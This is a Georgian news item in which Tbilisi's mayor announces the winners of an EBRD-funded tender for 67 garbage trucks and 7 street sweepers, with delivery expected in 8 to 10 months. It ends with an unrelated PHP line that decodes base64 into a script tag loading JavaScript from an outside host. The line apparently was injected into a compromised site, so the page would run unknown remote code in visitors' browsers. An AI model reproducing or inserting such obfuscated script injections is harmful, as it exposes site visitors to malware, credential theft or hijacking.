celsiusi
ავერსი საქკაბელი
თბილისის მერის განცხადებით, ნარჩენების მართვის პროგრამით გათვალისწინებული 9 მლნ ევროს ღირებულების ტენდერში, რომელიც 67 ნაგავმზიდისა და 7 ქუჩის მექანიკური დამგველი მანქანის შეძენას მოიცავს, გამარჯვებული კომპანიები გამოვლინდნენ. როგორც კახა კალაძემ  მუნიციპალიტეტის მთავრობის სხდომის დაწყებამდე განაცხადა, ტექნიკას დედაქალაქი 8-10 თვის განმავლობაში მიიღებს.
 
მისივე ინფორმაციით, მყარი ნარჩენების მართვის პროგრამა EBRD-თან სასესხო ხელშეკრულების ფარგლებში ხორციელდება და ტენდერიც ევროპის განვითარებისა და რეკონსტრუქციის ბანკის ორგანიზების გაიმართა.
 
„პროექტის ფარგლებში გადაწყვეტილია ნაგავმზიდების შეძენა. გამოცხადებულ ტენდერში გვყავს გამარჯვებული კომპანიები, რომლებიც შესაბამის ტექნიკას მოგვაწვდიან. პროექტისთვის 15 მლნ ევრო იყო გამოყოფილი. ამ სესხის ძირითადი კომპონენტებია სპეცტექნიკის - მათ შორის 67 ერთეული ნაგავმზიდისა და 7 ქუჩის მექანიკური დამგველის - სვიპერის შეძენა, რომლის ღირებულება, ჯამში, 9 მლნ ევროა.
 
ამ ტექნიკის არსებობა ქალაქში ძალიან მნიშვნელოვანია, რათა ადამიანებმა რომლებიც დასუფთავებაში მუშაობენ კომფორტულად შეძლონ მუშაობა.
 
ხელშეკრულება კომპანიებთან გაფორმებულია და 8-10 თვეში ეს ტექნიკა თბილისს უნდა მოეწოდოს“, - განაცხადა კალაძემ.
 
თბილისის მერის თქმით, გარდა ამისა საქართველოს მთავრობასა და EBRD-ს შორის გაფორმებული სასესხო ხელშეკრულები ფარგლებში დამატებითი 65 ერთეული ტექნიკის შესყიდვა იგეგმება, მათ შორის იქნება 44 ნარჩენების შემგროვებელი მანქანა.
 
„ზოგადად, თბილისს 120 ნაგავმზიდი ემსახურება და მთლიანად ეს პარკი მთლიანად განახლდება“, - აღნიშნა კალაძემ.
1142
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");